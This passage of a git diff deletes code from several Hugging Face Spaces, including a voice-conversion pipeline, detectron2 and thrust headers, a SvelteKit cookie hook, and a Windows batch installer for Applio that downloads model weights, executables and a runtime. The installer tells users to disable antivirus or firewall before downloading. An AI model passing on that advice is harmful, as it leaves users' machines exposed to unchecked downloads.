324]; - 3. silver fork on plate, [4, 547, 252, 612]; - """ - return dense_caption - - def image_dense_caption(self, image_src): - dense_caption = image_caption_api(image_src, self.device) - print('\033[1;35m' + '*' * 100 + '\033[0m') - print("Step2, Dense Caption:\n") - print(dense_caption) - print('\033[1;35m' + '*' * 100 + '\033[0m') - return dense_caption - \ No newline at end of file diff --git a/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/detectron2/data/datasets/__init__.py b/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/detectron2/data/datasets/__init__.py deleted file mode 100644 index a44bedc15e5f0e762fc4d77efd6f1b07c6ff77d0..0000000000000000000000000000000000000000 --- a/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/detectron2/data/datasets/__init__.py +++ /dev/null @@ -1,9 +0,0 @@ -# Copyright (c) Facebook, Inc. 
and its affiliates. -from .coco import load_coco_json, load_sem_seg, register_coco_instances, convert_to_coco_json -from .coco_panoptic import register_coco_panoptic, register_coco_panoptic_separated -from .lvis import load_lvis_json, register_lvis_instances, get_lvis_instances_meta -from .pascal_voc import load_voc_instances, register_pascal_voc -from . import builtin as _builtin # ensure the builtin datasets are registered - - -__all__ = [k for k in globals().keys() if not k.startswith("_")] diff --git a/spaces/Bart92/RVC_HF/go-applio-manager-recode.bat b/spaces/Bart92/RVC_HF/go-applio-manager-recode.bat deleted file mode 100644 index 91b8acfc0c69a356fd5b1d77650b2cd728b1072b..0000000000000000000000000000000000000000 --- a/spaces/Bart92/RVC_HF/go-applio-manager-recode.bat +++ /dev/null @@ -1,322 +0,0 @@ -@echo off -title Applio Installer - -::: _ _ _____ _ -::: /\ | (_) | __ \ | | -::: / \ _ __ _ __ | |_ ___ | |__) |___ ___ ___ __| | ___ -::: / /\ \ | '_ \| '_ \| | |/ _ \ | _ // _ \/ __/ _ \ / _` |/ _ \ -::: / ____ \| |_) | |_) | | | (_) | | | \ \ __/ (_| (_) | (_| | __/ -::: /_/ \_\ .__/| .__/|_|_|\___/ |_| \_\___|\___\___/ \__,_|\___| -::: | | | | -::: |_| |_| -::: -::: - -setlocal -set "branch=applio-recode" -set "runtime=runtime-recode" -set "repoUrl=https://github.com/IAHispano/Applio-RVC-Fork/archive/refs/heads/%branch%.zip" -set "fixesFolder=fixes" -set "localFixesPy=local_fixes.py" -set "principal=%cd%" -set "URL_BASE=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main" -set "URL_EXTRA=https://huggingface.co/IAHispano/applio/resolve/main" - -:menu -for /f "delims=: tokens=*" %%A in ('findstr /b ":::" "%~f0"') do @echo(%%A - -echo [1] Reinstall Applio -echo [2] Update Applio -echo [3] Update Applio + Runtime -echo. - -set /p choice=Select an option: -set choice=%choice: =% - -if "%choice%"=="1" ( - cls - echo Starting Applio Reinstaller... - echo. - goto reinstaller - pause - cls - goto menu - -) - -if "%choice%"=="2" ( - cls - echo Starting Applio Updater... - echo. - goto updater - pause - cls - goto menu -) - -if "%choice%"=="3" ( - cls - echo Updating Applio + Runtime... - echo. - goto updaterRuntime - pause - cls - goto menu - -) - -cls -echo Invalid option. Please enter a number from 1 to 3. -echo. -echo Press 'Enter' to access the main menu... -pause>nul -cls -goto menu - -:reinstaller - -echo WARNING: Remember to install Microsoft C++ Build Tools, Redistributable, Python, and Git before continuing. -echo. -echo Step-by-step guide: https://rentry.org/appliolocal -echo Build Tools: https://aka.ms/vs/17/release/vs_BuildTools.exe -echo Redistributable: https://aka.ms/vs/17/release/vc_redist.x64.exe -echo Git: https://github.com/git-for-windows/git/releases/download/v2.42.0.windows.2/Git-2.42.0.2-64-bit.exe -echo Python: Add this route to the windows enviroment variables the user path variable: %principal%\runtime\Scripts -echo. -pause -cls - -echo Downloading ZIP file... -powershell -command "& { Invoke-WebRequest -Uri '%repoUrl%' -OutFile '%principal%\repo.zip' }" -echo. - -echo Extracting ZIP file... -powershell -command "& { Add-Type -AssemblyName System.IO.Compression.FileSystem ; [System.IO.Compression.ZipFile]::ExtractToDirectory('%principal%\repo.zip', '%principal%') }" -echo. - -echo Copying folder and file structure from subdirectory to main directory... -robocopy "%principal%\Applio-RVC-Fork-%branch%" "%principal%" /E -echo. - -echo Deleting contents of subdirectory (files and folders)... -rmdir "%principal%\Applio-RVC-Fork-%branch%" /S /Q -echo. 
- -echo Cleaning up... -del "%principal%\repo.zip" -echo. -cls - -echo Proceeding to download the models... -echo. - -echo WARNING: At this point, it's recommended to disable antivirus or firewall, as errors might occur when downloading pretrained models. -pause -cls - -echo Downloading models in the assets folder... -cd "assets" -echo. -echo Downloading the "pretrained" folder... -cd "pretrained" -curl -LJO "%URL_BASE%/pretrained/D32k.pth" -curl -LJO "%URL_BASE%/pretrained/D40k.pth" -curl -LJO "%URL_BASE%/pretrained/D48k.pth" -curl -LJO "%URL_BASE%/pretrained/G32k.pth" -curl -LJO "%URL_BASE%/pretrained/G40k.pth" -curl -LJO "%URL_BASE%/pretrained/G48k.pth" -curl -LJO "%URL_BASE%/pretrained/f0D32k.pth" -curl -LJO "%URL_BASE%/pretrained/f0D40k.pth" -curl -LJO "%URL_BASE%/pretrained/f0D48k.pth" -curl -LJO "%URL_BASE%/pretrained/f0G32k.pth" -curl -LJO "%URL_BASE%/pretrained/f0G40k.pth" -curl -LJO "%URL_BASE%/pretrained/f0G48k.pth" -cd ".." -echo. -cls - -echo Downloading the "pretrained_v2" folder... -cd "pretrained_v2" -curl -LJO "%URL_BASE%/pretrained_v2/D32k.pth" -curl -LJO "%URL_BASE%/pretrained_v2/D40k.pth" -curl -LJO "%URL_BASE%/pretrained_v2/D48k.pth" -curl -LJO "%URL_BASE%/pretrained_v2/G32k.pth" -curl -LJO "%URL_BASE%/pretrained_v2/G40k.pth" -curl -LJO "%URL_BASE%/pretrained_v2/G48k.pth" -curl -LJO "%URL_BASE%/pretrained_v2/f0D32k.pth" -curl -LJO "%URL_BASE%/pretrained_v2/f0D40k.pth" -curl -LJO "%URL_BASE%/pretrained_v2/f0D48k.pth" -curl -LJO "%URL_BASE%/pretrained_v2/f0G32k.pth" -curl -LJO "%URL_BASE%/pretrained_v2/f0G40k.pth" -curl -LJO "%URL_BASE%/pretrained_v2/f0G48k.pth" -cd ".." -echo. -cls - -echo Downloading the hubert_base.pt file... -cd "hubert" -curl -LJO "%URL_BASE%/hubert_base.pt" -cd ".." -echo. -cls - - -echo Downloading the rmvpe.pt file... -cd "rmvpe" -curl -LJO "%URL_BASE%/rmvpe.pt" -echo. -cls - -echo Downloading the rmvpe.onnx file... -curl -LJO "%URL_BASE%/rmvpe.onnx" -cd ".." -cd ".." -echo. -cls - -echo Downloading the rest of the large files - -echo Downloading the "uvr5_weights" folder... -cd "uvr5_weights" -curl -LJO "%URL_BASE%/uvr5_weights/HP2_all_vocals.pth" -curl -LJO "%URL_BASE%/uvr5_weights/HP3_all_vocals.pth" -curl -LJO "%URL_BASE%/uvr5_weights/HP5_only_main_vocal.pth" -curl -LJO "%URL_BASE%/uvr5_weights/VR-DeEchoAggressive.pth" -curl -LJO "%URL_BASE%/uvr5_weights/VR-DeEchoDeReverb.pth" -curl -LJO "%URL_BASE%/uvr5_weights/VR-DeEchoNormal.pth" -cd ".." -echo. -cls - -echo Downloading the ffmpeg.exe file... -curl -LJO "%URL_BASE%/ffmpeg.exe" -echo. -cls - -echo Downloading the ffprobe.exe file... -curl -LJO "%URL_BASE%/ffprobe.exe" -echo. -cls - -echo Downloading the runtime.zip file... -curl -LJO "%URL_EXTRA%/%runtime%.zip" -echo. -cls - -echo Extracting the runtime.zip file, this might take a while... -powershell -Command "Expand-Archive -Path '%runtime%.zip' -DestinationPath '.'" -del %runtime%.zip -echo. -cls - -echo Downloads completed! -echo. - -echo Checking if the local_fixes.py file exists in the Fixes folder... -if exist "%fixesFolder%\%localFixesPy%" ( - echo Running the file... - runtime\python.exe "%fixesFolder%\%localFixesPy%" -) else ( - echo The "%localFixesPy%" file was not found in the "Fixes" folder. -) -echo. - -echo Fixes Applied! -echo. - -echo Applio has been reinstalled! -echo. -echo Press 'Enter' to access the main menu... -pause>nul -cls -goto menu - - -:updater - -echo Downloading the ZIP file... -powershell -command "& { Invoke-WebRequest -Uri '%repoUrl%' -OutFile '%principal%\repo.zip' }" -echo. - -echo Extracting ZIP file... 
-powershell -command "& { Add-Type -AssemblyName System.IO.Compression.FileSystem ; [System.IO.Compression.ZipFile]::ExtractToDirectory('%principal%\repo.zip', '%principal%') }" -echo. - -echo Copying folder and file structure from subdirectory to main directory... -robocopy "%principal%\Applio-RVC-Fork-%branch%" "%principal%" /E -echo. - -echo Deleting contents of the subdirectory (files and folders)... -rmdir "%principal%\Applio-RVC-Fork-%branch%" /S /Q -echo. - -echo Cleaning up... -del "%principal%\repo.zip" -echo. -cls - -echo Verifying if the local_fixes.py file exists in the Fixes folder... -if exist "%fixesFolder%\%localFixesPy%" ( - echo Running the file... - runtime\python.exe "%fixesFolder%\%localFixesPy%" -) else ( - echo The file "%localFixesPy%" was not found in the "Fixes" folder. -) -echo. - -echo Applio has been updated! -echo. -echo Press 'Enter' to access the main menu... -pause>nul -cls -goto menu - - -:updaterRuntime - -echo Downloading the ZIP file... -powershell -command "& { Invoke-WebRequest -Uri '%repoUrl%' -OutFile '%principal%\repo.zip' }" -echo. - -echo Extracting ZIP file... -powershell -command "& { Add-Type -AssemblyName System.IO.Compression.FileSystem ; [System.IO.Compression.ZipFile]::ExtractToDirectory('%principal%\repo.zip', '%principal%') }" -echo. - -echo Copying folder and file structure from subdirectory to main directory... -robocopy "%principal%\Applio-RVC-Fork-%branch%" "%principal%" /E -echo. - -echo Deleting contents of the subdirectory (files and folders)... -rmdir "%principal%\Applio-RVC-Fork-%branch%" /S /Q -echo. - -echo Cleaning up... -del "%principal%\repo.zip" -echo. -cls - -echo Downloading the runtime.zip file... -curl -LJO "%URL_EXTRA%/%runtime%.zip" -echo. -cls -echo Extracting the runtime.zip file, this might take a while... -powershell -Command "Expand-Archive -Path '%runtime%.zip' -DestinationPath '.'" -del runtime.zip -echo. -cls - -echo Verifying if the local_fixes.py file exists in the Fixes folder... -if exist "%fixesFolder%\%localFixesPy%" ( - echo Running the file... - runtime\python.exe "%fixesFolder%\%localFixesPy%" -) else ( - echo The file "%localFixesPy%" was not found in the "Fixes" folder. -) -echo. - -echo Applio has been updated! -echo. -echo Press 'Enter' to access the main menu... 
-pause>nul -cls -goto menu diff --git a/spaces/BartPoint/VoiceChange_Beta/vc_infer_pipeline.py b/spaces/BartPoint/VoiceChange_Beta/vc_infer_pipeline.py deleted file mode 100644 index 82c15f59a8072e1b317fa1d750ccc1b814a6989d..0000000000000000000000000000000000000000 --- a/spaces/BartPoint/VoiceChange_Beta/vc_infer_pipeline.py +++ /dev/null @@ -1,443 +0,0 @@ -import numpy as np, parselmouth, torch, pdb, sys, os -from time import time as ttime -import torch.nn.functional as F -import scipy.signal as signal -import pyworld, os, traceback, faiss, librosa, torchcrepe -from scipy import signal -from functools import lru_cache - -now_dir = os.getcwd() -sys.path.append(now_dir) - -bh, ah = signal.butter(N=5, Wn=48, btype="high", fs=16000) - -input_audio_path2wav = {} - - -@lru_cache -def cache_harvest_f0(input_audio_path, fs, f0max, f0min, frame_period): - audio = input_audio_path2wav[input_audio_path] - f0, t = pyworld.harvest( - audio, - fs=fs, - f0_ceil=f0max, - f0_floor=f0min, - frame_period=frame_period, - ) - f0 = pyworld.stonemask(audio, f0, t, fs) - return f0 - - -def change_rms(data1, sr1, data2, sr2, rate): # 1是输入音频,2是输出音频,rate是2的占比 - # print(data1.max(),data2.max()) - rms1 = librosa.feature.rms( - y=data1, frame_length=sr1 // 2 * 2, hop_length=sr1 // 2 - ) # 每半秒一个点 - rms2 = librosa.feature.rms(y=data2, frame_length=sr2 // 2 * 2, hop_length=sr2 // 2) - rms1 = torch.from_numpy(rms1) - rms1 = F.interpolate( - rms1.unsqueeze(0), size=data2.shape[0], mode="linear" - ).squeeze() - rms2 = torch.from_numpy(rms2) - rms2 = F.interpolate( - rms2.unsqueeze(0), size=data2.shape[0], mode="linear" - ).squeeze() - rms2 = torch.max(rms2, torch.zeros_like(rms2) + 1e-6) - data2 *= ( - torch.pow(rms1, torch.tensor(1 - rate)) - * torch.pow(rms2, torch.tensor(rate - 1)) - ).numpy() - return data2 - - -class VC(object): - def __init__(self, tgt_sr, config): - self.x_pad, self.x_query, self.x_center, self.x_max, self.is_half = ( - config.x_pad, - config.x_query, - config.x_center, - config.x_max, - config.is_half, - ) - self.sr = 16000 # hubert输入采样率 - self.window = 160 # 每帧点数 - self.t_pad = self.sr * self.x_pad # 每条前后pad时间 - self.t_pad_tgt = tgt_sr * self.x_pad - self.t_pad2 = self.t_pad * 2 - self.t_query = self.sr * self.x_query # 查询切点前后查询时间 - self.t_center = self.sr * self.x_center # 查询切点位置 - self.t_max = self.sr * self.x_max # 免查询时长阈值 - self.device = config.device - - def get_f0( - self, - input_audio_path, - x, - p_len, - f0_up_key, - f0_method, - filter_radius, - inp_f0=None, - ): - global input_audio_path2wav - time_step = self.window / self.sr * 1000 - f0_min = 50 - f0_max = 1100 - f0_mel_min = 1127 * np.log(1 + f0_min / 700) - f0_mel_max = 1127 * np.log(1 + f0_max / 700) - if f0_method == "pm": - f0 = ( - parselmouth.Sound(x, self.sr) - .to_pitch_ac( - time_step=time_step / 1000, - voicing_threshold=0.6, - pitch_floor=f0_min, - pitch_ceiling=f0_max, - ) - .selected_array["frequency"] - ) - pad_size = (p_len - len(f0) + 1) // 2 - if pad_size > 0 or p_len - len(f0) - pad_size > 0: - f0 = np.pad( - f0, [[pad_size, p_len - len(f0) - pad_size]], mode="constant" - ) - elif f0_method == "harvest": - input_audio_path2wav[input_audio_path] = x.astype(np.double) - f0 = cache_harvest_f0(input_audio_path, self.sr, f0_max, f0_min, 10) - if filter_radius > 2: - f0 = signal.medfilt(f0, 3) - elif f0_method == "crepe": - model = "full" - # Pick a batch size that doesn't cause memory errors on your gpu - batch_size = 512 - # Compute pitch using first gpu - audio = torch.tensor(np.copy(x))[None].float() - f0, pd = 
torchcrepe.predict( - audio, - self.sr, - self.window, - f0_min, - f0_max, - model, - batch_size=batch_size, - device=self.device, - return_periodicity=True, - ) - pd = torchcrepe.filter.median(pd, 3) - f0 = torchcrepe.filter.mean(f0, 3) - f0[pd < 0.1] = 0 - f0 = f0[0].cpu().numpy() - elif f0_method == "rmvpe": - if hasattr(self, "model_rmvpe") == False: - from rmvpe import RMVPE - - print("loading rmvpe model") - self.model_rmvpe = RMVPE( - "rmvpe.pt", is_half=self.is_half, device=self.device - ) - f0 = self.model_rmvpe.infer_from_audio(x, thred=0.03) - f0 *= pow(2, f0_up_key / 12) - # with open("test.txt","w")as f:f.write("\n".join([str(i)for i in f0.tolist()])) - tf0 = self.sr // self.window # 每秒f0点数 - if inp_f0 is not None: - delta_t = np.round( - (inp_f0[:, 0].max() - inp_f0[:, 0].min()) * tf0 + 1 - ).astype("int16") - replace_f0 = np.interp( - list(range(delta_t)), inp_f0[:, 0] * 100, inp_f0[:, 1] - ) - shape = f0[self.x_pad * tf0 : self.x_pad * tf0 + len(replace_f0)].shape[0] - f0[self.x_pad * tf0 : self.x_pad * tf0 + len(replace_f0)] = replace_f0[ - :shape - ] - # with open("test_opt.txt","w")as f:f.write("\n".join([str(i)for i in f0.tolist()])) - f0bak = f0.copy() - f0_mel = 1127 * np.log(1 + f0 / 700) - f0_mel[f0_mel > 0] = (f0_mel[f0_mel > 0] - f0_mel_min) * 254 / ( - f0_mel_max - f0_mel_min - ) + 1 - f0_mel[f0_mel <= 1] = 1 - f0_mel[f0_mel > 255] = 255 - f0_coarse = np.rint(f0_mel).astype(np.int) - return f0_coarse, f0bak # 1-0 - - def vc( - self, - model, - net_g, - sid, - audio0, - pitch, - pitchf, - times, - index, - big_npy, - index_rate, - version, - protect, - ): # ,file_index,file_big_npy - feats = torch.from_numpy(audio0) - if self.is_half: - feats = feats.half() - else: - feats = feats.float() - if feats.dim() == 2: # double channels - feats = feats.mean(-1) - assert feats.dim() == 1, feats.dim() - feats = feats.view(1, -1) - padding_mask = torch.BoolTensor(feats.shape).to(self.device).fill_(False) - - inputs = { - "source": feats.to(self.device), - "padding_mask": padding_mask, - "output_layer": 9 if version == "v1" else 12, - } - t0 = ttime() - with torch.no_grad(): - logits = model.extract_features(**inputs) - feats = model.final_proj(logits[0]) if version == "v1" else logits[0] - if protect < 0.5 and pitch != None and pitchf != None: - feats0 = feats.clone() - if ( - isinstance(index, type(None)) == False - and isinstance(big_npy, type(None)) == False - and index_rate != 0 - ): - npy = feats[0].cpu().numpy() - if self.is_half: - npy = npy.astype("float32") - - # _, I = index.search(npy, 1) - # npy = big_npy[I.squeeze()] - - score, ix = index.search(npy, k=8) - weight = np.square(1 / score) - weight /= weight.sum(axis=1, keepdims=True) - npy = np.sum(big_npy[ix] * np.expand_dims(weight, axis=2), axis=1) - - if self.is_half: - npy = npy.astype("float16") - feats = ( - torch.from_numpy(npy).unsqueeze(0).to(self.device) * index_rate - + (1 - index_rate) * feats - ) - - feats = F.interpolate(feats.permute(0, 2, 1), scale_factor=2).permute(0, 2, 1) - if protect < 0.5 and pitch != None and pitchf != None: - feats0 = F.interpolate(feats0.permute(0, 2, 1), scale_factor=2).permute( - 0, 2, 1 - ) - t1 = ttime() - p_len = audio0.shape[0] // self.window - if feats.shape[1] < p_len: - p_len = feats.shape[1] - if pitch != None and pitchf != None: - pitch = pitch[:, :p_len] - pitchf = pitchf[:, :p_len] - - if protect < 0.5 and pitch != None and pitchf != None: - pitchff = pitchf.clone() - pitchff[pitchf > 0] = 1 - pitchff[pitchf < 1] = protect - pitchff = pitchff.unsqueeze(-1) - 
feats = feats * pitchff + feats0 * (1 - pitchff) - feats = feats.to(feats0.dtype) - p_len = torch.tensor([p_len], device=self.device).long() - with torch.no_grad(): - if pitch != None and pitchf != None: - audio1 = ( - (net_g.infer(feats, p_len, pitch, pitchf, sid)[0][0, 0]) - .data.cpu() - .float() - .numpy() - ) - else: - audio1 = ( - (net_g.infer(feats, p_len, sid)[0][0, 0]).data.cpu().float().numpy() - ) - del feats, p_len, padding_mask - if torch.cuda.is_available(): - torch.cuda.empty_cache() - t2 = ttime() - times[0] += t1 - t0 - times[2] += t2 - t1 - return audio1 - - def pipeline( - self, - model, - net_g, - sid, - audio, - input_audio_path, - times, - f0_up_key, - f0_method, - file_index, - # file_big_npy, - index_rate, - if_f0, - filter_radius, - tgt_sr, - resample_sr, - rms_mix_rate, - version, - protect, - f0_file=None, - ): - if ( - file_index != "" - # and file_big_npy != "" - # and os.path.exists(file_big_npy) == True - and os.path.exists(file_index) == True - and index_rate != 0 - ): - try: - index = faiss.read_index(file_index) - # big_npy = np.load(file_big_npy) - big_npy = index.reconstruct_n(0, index.ntotal) - except: - traceback.print_exc() - index = big_npy = None - else: - index = big_npy = None - audio = signal.filtfilt(bh, ah, audio) - audio_pad = np.pad(audio, (self.window // 2, self.window // 2), mode="reflect") - opt_ts = [] - if audio_pad.shape[0] > self.t_max: - audio_sum = np.zeros_like(audio) - for i in range(self.window): - audio_sum += audio_pad[i : i - self.window] - for t in range(self.t_center, audio.shape[0], self.t_center): - opt_ts.append( - t - - self.t_query - + np.where( - np.abs(audio_sum[t - self.t_query : t + self.t_query]) - == np.abs(audio_sum[t - self.t_query : t + self.t_query]).min() - )[0][0] - ) - s = 0 - audio_opt = [] - t = None - t1 = ttime() - audio_pad = np.pad(audio, (self.t_pad, self.t_pad), mode="reflect") - p_len = audio_pad.shape[0] // self.window - inp_f0 = None - if hasattr(f0_file, "name") == True: - try: - with open(f0_file.name, "r") as f: - lines = f.read().strip("\n").split("\n") - inp_f0 = [] - for line in lines: - inp_f0.append([float(i) for i in line.split(",")]) - inp_f0 = np.array(inp_f0, dtype="float32") - except: - traceback.print_exc() - sid = torch.tensor(sid, device=self.device).unsqueeze(0).long() - pitch, pitchf = None, None - if if_f0 == 1: - pitch, pitchf = self.get_f0( - input_audio_path, - audio_pad, - p_len, - f0_up_key, - f0_method, - filter_radius, - inp_f0, - ) - pitch = pitch[:p_len] - pitchf = pitchf[:p_len] - if self.device == "mps": - pitchf = pitchf.astype(np.float32) - pitch = torch.tensor(pitch, device=self.device).unsqueeze(0).long() - pitchf = torch.tensor(pitchf, device=self.device).unsqueeze(0).float() - t2 = ttime() - times[1] += t2 - t1 - for t in opt_ts: - t = t // self.window * self.window - if if_f0 == 1: - audio_opt.append( - self.vc( - model, - net_g, - sid, - audio_pad[s : t + self.t_pad2 + self.window], - pitch[:, s // self.window : (t + self.t_pad2) // self.window], - pitchf[:, s // self.window : (t + self.t_pad2) // self.window], - times, - index, - big_npy, - index_rate, - version, - protect, - )[self.t_pad_tgt : -self.t_pad_tgt] - ) - else: - audio_opt.append( - self.vc( - model, - net_g, - sid, - audio_pad[s : t + self.t_pad2 + self.window], - None, - None, - times, - index, - big_npy, - index_rate, - version, - protect, - )[self.t_pad_tgt : -self.t_pad_tgt] - ) - s = t - if if_f0 == 1: - audio_opt.append( - self.vc( - model, - net_g, - sid, - audio_pad[t:], - pitch[:, t // 
self.window :] if t is not None else pitch, - pitchf[:, t // self.window :] if t is not None else pitchf, - times, - index, - big_npy, - index_rate, - version, - protect, - )[self.t_pad_tgt : -self.t_pad_tgt] - ) - else: - audio_opt.append( - self.vc( - model, - net_g, - sid, - audio_pad[t:], - None, - None, - times, - index, - big_npy, - index_rate, - version, - protect, - )[self.t_pad_tgt : -self.t_pad_tgt] - ) - audio_opt = np.concatenate(audio_opt) - if rms_mix_rate != 1: - audio_opt = change_rms(audio, 16000, audio_opt, tgt_sr, rms_mix_rate) - if resample_sr >= 16000 and tgt_sr != resample_sr: - audio_opt = librosa.resample( - audio_opt, orig_sr=tgt_sr, target_sr=resample_sr - ) - audio_max = np.abs(audio_opt).max() / 0.99 - max_int16 = 32768 - if audio_max > 1: - max_int16 /= audio_max - audio_opt = (audio_opt * max_int16).astype(np.int16) - del pitch, pitchf, sid - if torch.cuda.is_available(): - torch.cuda.empty_cache() - return audio_opt diff --git a/spaces/BetterAPI/BetterChat_new/src/hooks.server.ts b/spaces/BetterAPI/BetterChat_new/src/hooks.server.ts deleted file mode 100644 index 04cc75cac042fda3cabd7244584ae9aa5bf2a46f..0000000000000000000000000000000000000000 --- a/spaces/BetterAPI/BetterChat_new/src/hooks.server.ts +++ /dev/null @@ -1,37 +0,0 @@ -import { dev } from "$app/environment"; -import { COOKIE_NAME } from "$env/static/private"; -import type { Handle } from "@sveltejs/kit"; -import { PUBLIC_GOOGLE_ANALYTICS_ID } from "$env/static/public"; -import { addYears } from "date-fns"; - -export const handle: Handle = async ({ event, resolve }) => { - const token = event.cookies.get(COOKIE_NAME); - - event.locals.sessionId = token || crypto.randomUUID(); - - // Refresh cookie expiration date - event.cookies.set(COOKIE_NAME, event.locals.sessionId, { - path: "/", - // So that it works inside the space's iframe - sameSite: dev ? "lax" : "none", - secure: !dev, - httpOnly: true, - expires: addYears(new Date(), 1), - }); - - let replaced = false; - - const response = await resolve(event, { - transformPageChunk: (chunk) => { - // For some reason, Sveltekit doesn't let us load env variables from .env in the app.html template - if (replaced || !chunk.html.includes("%gaId%")) { - return chunk.html; - } - replaced = true; - - return chunk.html.replace("%gaId%", PUBLIC_GOOGLE_ANALYTICS_ID); - }, - }); - - return response; -}; diff --git a/spaces/BillBojangeles2000/WikiGPT/README.md b/spaces/BillBojangeles2000/WikiGPT/README.md deleted file mode 100644 index d7b841426bcaffad9d751fd2134aef2fc02d1812..0000000000000000000000000000000000000000 --- a/spaces/BillBojangeles2000/WikiGPT/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Karki TEST -emoji: 🐠 -colorFrom: blue -colorTo: red -sdk: streamlit -sdk_version: 1.17.0 -app_file: app.py -pinned: false -license: apache-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/CVPR/Dual-Key_Backdoor_Attacks/datagen/detectron2/detectron2/structures/__init__.py b/spaces/CVPR/Dual-Key_Backdoor_Attacks/datagen/detectron2/detectron2/structures/__init__.py deleted file mode 100644 index e7eef0005151406d7b74433f49075a8bb5a213f9..0000000000000000000000000000000000000000 --- a/spaces/CVPR/Dual-Key_Backdoor_Attacks/datagen/detectron2/detectron2/structures/__init__.py +++ /dev/null @@ -1,10 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. 
All Rights Reserved -from .boxes import Boxes, BoxMode, pairwise_iou -from .image_list import ImageList -from .instances import Instances -from .keypoints import Keypoints, heatmaps_to_keypoints -from .masks import BitMasks, PolygonMasks, rasterize_polygons_within_box, polygons_to_bitmask -from .rotated_boxes import RotatedBoxes -from .rotated_boxes import pairwise_iou as pairwise_iou_rotated - -__all__ = [k for k in globals().keys() if not k.startswith("_")] diff --git a/spaces/CVPR/LIVE/thrust/thrust/mr/sync_pool.h b/spaces/CVPR/LIVE/thrust/thrust/mr/sync_pool.h deleted file mode 100644 index 9cf8640cab158b87bc806976b6f10d1ec0a6e7c0..0000000000000000000000000000000000000000 --- a/spaces/CVPR/LIVE/thrust/thrust/mr/sync_pool.h +++ /dev/null @@ -1,116 +0,0 @@ -/* - * Copyright 2018 NVIDIA Corporation - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -/*! \file sync_pool.h - * \brief A mutex-synchronized version of \p unsynchronized_pool_resource. - */ - -#pragma once - -#include - -#if THRUST_CPP_DIALECT >= 2011 - -#include - -#include - -namespace thrust -{ -namespace mr -{ - -/*! \addtogroup memory_management Memory Management - * \addtogroup memory_management_classes Memory Management Classes - * \addtogroup memory_resources Memory Resources - * \ingroup memory_resources - * \{ - */ - -/*! A mutex-synchronized version of \p unsynchronized_pool_resource. Uses \p std::mutex, and therefore requires C++11. - * - * \tparam Upstream the type of memory resources that will be used for allocating memory - */ -template -struct synchronized_pool_resource : public memory_resource -{ - typedef unsynchronized_pool_resource unsync_pool; - typedef std::lock_guard lock_t; - - typedef typename Upstream::pointer void_ptr; - -public: - /*! Get the default options for a pool. These are meant to be a sensible set of values for many use cases, - * and as such, may be tuned in the future. This function is exposed so that creating a set of options that are - * just a slight departure from the defaults is easy. - */ - static pool_options get_default_options() - { - return unsync_pool::get_default_options(); - } - - /*! Constructor. - * - * \param upstream the upstream memory resource for allocations - * \param options pool options to use - */ - synchronized_pool_resource(Upstream * upstream, pool_options options = get_default_options()) - : upstream_pool(upstream, options) - { - } - - /*! Constructor. The upstream resource is obtained by calling \p get_global_resource. - * - * \param options pool options to use - */ - synchronized_pool_resource(pool_options options = get_default_options()) - : upstream_pool(get_global_resource(), options) - { - } - - /*! Releases all held memory to upstream. 
- */ - void release() - { - lock_t lock(mtx); - upstream_pool.release(); - } - - THRUST_NODISCARD virtual void_ptr do_allocate(std::size_t bytes, std::size_t alignment = THRUST_MR_DEFAULT_ALIGNMENT) THRUST_OVERRIDE - { - lock_t lock(mtx); - return upstream_pool.do_allocate(bytes, alignment); - } - - virtual void do_deallocate(void_ptr p, std::size_t n, std::size_t alignment = THRUST_MR_DEFAULT_ALIGNMENT) THRUST_OVERRIDE - { - lock_t lock(mtx); - upstream_pool.do_deallocate(p, n, alignment); - } - -private: - std::mutex mtx; - unsync_pool upstream_pool; -}; - -/*! \} - */ - -} // end mr -} // end thrust - -#endif // THRUST_CPP_DIALECT >= 2011 - diff --git a/spaces/CVPR/LIVE/thrust/thrust/system/cpp/detail/logical.h b/spaces/CVPR/LIVE/thrust/thrust/system/cpp/detail/logical.h deleted file mode 100644 index c6ae90664ad9538e73febfde86c334011de417c8..0000000000000000000000000000000000000000 --- a/spaces/CVPR/LIVE/thrust/thrust/system/cpp/detail/logical.h +++ /dev/null @@ -1,22 +0,0 @@ -/* - * Copyright 2008-2013 NVIDIA Corporation - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -#pragma once - -#include - -// this system has no special version of this algorithm - diff --git a/spaces/CVPR/LIVE/thrust/thrust/system/detail/generic/mismatch.h b/spaces/CVPR/LIVE/thrust/thrust/system/detail/generic/mismatch.h deleted file mode 100644 index 50e9f678b1ff6a85c2d32e5ab45aed88a1c7224b..0000000000000000000000000000000000000000 --- a/spaces/CVPR/LIVE/thrust/thrust/system/detail/generic/mismatch.h +++ /dev/null @@ -1,58 +0,0 @@ -/* - * Copyright 2008-2013 NVIDIA Corporation - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. 
